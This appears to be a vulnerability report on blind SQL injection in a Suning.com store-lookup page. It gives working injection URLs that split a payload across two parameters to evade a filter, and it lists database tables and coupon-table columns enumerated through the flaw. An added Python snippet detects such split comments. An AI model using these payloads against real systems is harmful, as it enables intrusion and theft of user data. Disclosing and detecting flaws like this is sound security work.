DB2 blind SQL injection on Suning.com (苏宁易购)
Initial request:
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/--
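Injected parameters:
dist1 and storeName. Used together they bypass the SQL injection filter: the dist1 value ends with /* and the storeName value begins with */, so the payload is split across the two parameters.
Example blind-injection probe: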
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/*
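A per-parameter filter misses this because neither value is a complete statement on its own. The following detection sketch is an added example, not part of the original report: it decodes each query parameter and flags requests where one value leaves a /* open and another supplies the closing */. The function names and the benign sample URL are assumptions made for illustration.

```python
# Added example (not from the original report): flag requests whose
# parameters only form a balanced /* ... */ comment when taken together.
from urllib.parse import urlsplit, parse_qsl

def comment_state(value):
    """Report unbalanced block-comment delimiters in one decoded value."""
    flags, inside, i = set(), False, 0
    while i < len(value):
        two = value[i:i + 2]
        if two == "/*" and not inside:
            inside, i = True, i + 2
        elif two == "*/":
            if not inside:
                flags.add("stray_close")   # closes a comment opened elsewhere
            inside, i = False, i + 2
        else:
            i += 1
    if inside:
        flags.add("dangling_open")         # comment runs past this value
    return flags

def split_comment_params(url):
    """Return which parameters open and which close a cross-parameter comment."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    opens = [k for k, v in params if "dangling_open" in comment_state(v)]
    closes = [k for k, v in params if "stray_close" in comment_state(v)]
    return {"opens": opens, "closes": closes, "split": bool(opens and closes)}

# First sample is the request quoted in the report; second is constructed.
REPORTED = ("https://www.suning.com/emall/SNNetStoreInfoView"
            "?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/--")
BENIGN = ("https://www.suning.com/emall/SNNetStoreInfoView"
          "?cityId1=9137&dist1=aa&storeName=abc")

if __name__ == "__main__":
    for url in (REPORTED, BENIGN):
        print(split_comment_params(url))
```

A hit is a detection signal only; the fix for the endpoint is to bind dist1 and storeName as query parameters instead of concatenating them into the SQL text.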
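I don't know whether the usernames are still there; this is blind injection, so guessing is slow. Below are some of the tables and so on obtained by simple guessing.
Proof of vulnerability: blind-injection guessing results: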
'ADVISE_INDEX','ADVISE_WORKLOAD','DMUSERBHVR','GRUSERAUTH','ORDUSERS','USERDEMO','USERLOCK','USERPROF','USERPVCDEV','USERPWDHST','USERREG','USERS','USER_QA','XACTJOINUSER','XGPUSERREL','XIPUSERS','XMEMBERCARDUSERS','XROULETTEUSERCOUNT','XROULETTEUSERS','XSECKILLUSERREL','XSENDUSERS','XSENDUSERS_BAK','XSMARTUSERCOUNT','XTMPUSERS','XUSERGRADE','XUSERGRADECONF','XUSERPREFER','ZST_USER','ZST_USER_ROLE','USEROPTIONS','SYSUSERAUTH','SYSUSEROPTIONS'
Table: XCOUPON (coupons)
'CHARGEDATE','CODE','COUPONGROUP_ID','COUPONTMP_ID','COUPON_ID','COUPON_NO','COUPON_TYPE','CREATED_BY','CREATED_DATE','DELIVERDATE','DESCRIPTION','ENDDATE','FIELD1','FIELD2','FIELD3','LAST_UPDATED','LEVEL','MARKFORDELETE','NAME','NOTES','OPTCOUNTER','ORDERS_ID','PAR_VALUE','PASSWORD','REMAININGAMOUNT','SERIALNUMBER','SOURCE_ID','SOURCE_TYPE','STARTDATE','STATUS','UPDATED_BY','USERS_ID'